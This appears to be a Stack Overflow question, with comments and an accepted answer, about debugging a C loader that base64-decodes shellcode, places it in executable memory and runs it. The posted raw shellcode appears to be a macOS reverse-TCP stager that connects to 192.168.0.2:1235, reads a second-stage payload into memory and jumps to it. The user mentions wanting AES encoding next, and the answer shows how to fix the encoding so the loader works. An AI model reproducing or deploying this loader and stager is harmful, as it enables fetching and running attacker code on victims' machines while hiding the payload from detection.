# Decoded shellcode doesn't execute: Illegal instruction: 4

Tags: c, base64, shellcode, ansi-c

I have a c application that decodes a base64 string that contains some shellcode and attempts to execute it and it seems to successfully decode but when it is executed the error `Illegal instruction: 4` occurs. This is most of the code:

```
unsigned char shellcode[] = "eDZheDAweDVmeDY4eDAweDEweDAweDAweDVleDZheDA3eDVheDY4eDAyeDEweDAweDAweDQxeDVheDZheDAweDQxeDU4eDZheDAweDQxeDU5eDY4eGM1eDAweDAweDAyeDU4eDBmeDA1eDBmeDgyeDc0eDAweDAweDAweDQ5eDg5eGM0eDZheDAweDQxeDVheDZheDBheDQxeDVieDZheDAyeDVmeDZheDAxeDVleDZheDAweDVheDY4eDYxeDAweDAweDAyeDU4eDBmeDA1eDcyeDMzeDQ4eDg5eGM3eDQ4eGI4eDAweDAyeDA0eGQzeGMweGE4eDAweDAyeDUweDU0eDVleDZheDEweDVheDY4eDYyeDAweDAweDAyeDU4eDBmeDA1eDcyeDE2eDRjeDg5eGU2eDY4eDAweDEweDAweDAweDVheDY4eDFkeDAweDAweDAyeDU4eDBmeDA1eDcyeDAzeDQxeGZmeGQ0eDQ5eGZmeGNieDc0eDFleDZheDAweDVmeDZheDAweDVleDZheDAweDVheDZheDAweDQxeDVheDZheDAweDZheDA1eDU0eDQxeDU4eDY4eDVkeDAweDAweDAyeDU4eDBmeDA1eGVieDk3eDY4eDAxeDAweDAweDAyeDU4eDZheDAxeDVmeDBmeDA1Cg==";
char buffer[4096];
int bufferLen = 4096;

int main() {

  base64decode(buffer, shellcode, sizeof(shellcode));
  printf("%s", buffer);

  void *ptr = mmap(NULL, bufferLen, (PROT_READ | PROT_WRITE | PROT_EXEC), (MAP_PRIVATE | MAP_ANONYMOUS), -1, 0);
  memcpy(ptr, buffer, bufferLen);

  int (*ret)() = (int(*)())ptr;
  ret();

}
```

The raw shellcode is `\x6a\x00\x5f\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x68\x02\x10\x00\x00\x41\x5a\x6a\x00\x41\x58\x6a\x00\x41\x59\x68\xc5\x00\x00\x02\x58\x0f\x05\x0f\x82\x74\x00\x00\x00\x49\x89\xc4\x6a\x00\x41\x5a\x6a\x0a\x41\x5b\x6a\x02\x5f\x6a\x01\x5e\x6a\x00\x5a\x68\x61\x00\x00\x02\x58\x0f\x05\x72\x33\x48\x89\xc7\x48\xb8\x00\x02\x04\xd3\xc0\xa8\x00\x02\x50\x54\x5e\x6a\x10\x5a\x68\x62\x00\x00\x02\x58\x0f\x05\x72\x16\x4c\x89\xe6\x68\x00\x10\x00\x00\x5a\x68\x1d\x00\x00\x02\x58\x0f\x05\x72\x03\x41\xff\xd4\x49\xff\xcb\x74\x1e\x6a\x00\x5f\x6a\x00\x5e\x6a\x00\x5a\x6a\x00\x41\x5a\x6a\x00\x6a\x05\x54\x41\x58\x68\x5d\x00\x00\x02\x58\x0f\x05\xeb\x97\x68\x01\x00\x00\x02\x58\x6a\x01\x5f\x0f\x05`
The printf statement returns the correct decoded shellcode without the backslashes, and that may have occurred during the decode, which could explain the error, but if I put double backslashes in the shellcode before encoding it prints with one backslash suggesting it is the printf command removing it. This means the shellcode is intact but it still has the error.

I am using the base64 decode function from here: https://github.com/rapid7/metasploit-framework/blob/master/data/headers/windows/base64.h

Comment: Do you wish us to decode that string by ourselves ?

Comment: sorry ill add the raw shellcode to the question

Comment: I encoded the raw shellcode that I added to the question. The fact that it returns as text-formatted hex numbers without backslashes is most likely the problem that I don't know how to fix.

Comment: what I want to do is decode and execute the shellcode

Comment: Even if you have properly copied your code section(or whatever it is called) the code you are trying to execute may still try to access global variables or something. Check that.

Comment: I am calling the shellcode with a function pointer. That is a well established way of executing it.

Comment: No, I have used raw shellcode many times in the past and thats not how it works. For example, if I try executing the raw shellcode without the encoding and decoding, using a function pointer, it works with our errors.

Comment: @Tom Karzesoh I think I see what you mean, I need to use an array not a string

Comment: You can type `@` followed by person's account name. That way is a convenient way to say something to that person.

Comment: Why the base64 encoding/decoding exercise and not just `buffer[] = "\x6a\x00\x5f\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x68\x02\x10\x00\x00\x41\x5a\x6a\x00...";`

Comment: @alk because I want a working example of decoding so I can expand to more complex algorithms like AES

Comment: @TomKarzes ok I see what you mean now but how does that help me fix the original problem

Comment: "*use an array not a string*" in C a "string" *is* an array, an array of `char` with at least one byte being equal to `0`, with the 1st `0` marking the end of the "string".

Comment: If the problem is with how the data is encoded, then you need to show how you encoded it.

Comment: I encoded simply using the macOS command line tool base64 and piped in the shellcode: `base64 <<< \x6a...`

Comment: @TomKarzes Thats completely correct. What I did was use the base64encode function thats in the same base64.h header to encode the shellcode and it gave me a different result. I then subbed the new encoded shellcode into my original code and it worked perfectly! If you add that as an answer I will accept it.

Comment: @alk I tried that already

Comment: @alk it works with toms solution which means everything else other than the encoding was correct, and I did try those methods. Its probably because those methods still encode as a human readable string as tom said

Comment: You need to have the shell output the actual bytes, not the text. For example, `echo -ne '\x12\x34.....' | base64`. This would work on Linux with Bash, I'm not sure about macOS.

Comment: ... or on bash as well `echo $'\x41\x42'`  to print `AB`.

Comment: @interjay: This https://apple.stackexchange.com/a/339839 might help for MACOS.

Answer (score 0, accepted):

The problem is with the encoded string.  The data being encoded was a human-readable string.  Instead, you need to encode the raw binary data.

You can put the data in a file for instance. You could write a C problem to do that for you. Then direct the file into `base64` as input (or pipe it directly from your program to `base64`). Just remember your data may contain bytes with the value zero, so you need to use `fwrite` or `write` to write it out.